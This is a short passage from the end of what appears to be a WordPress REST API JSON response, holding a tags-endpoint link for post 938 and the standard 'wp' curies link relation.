z.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
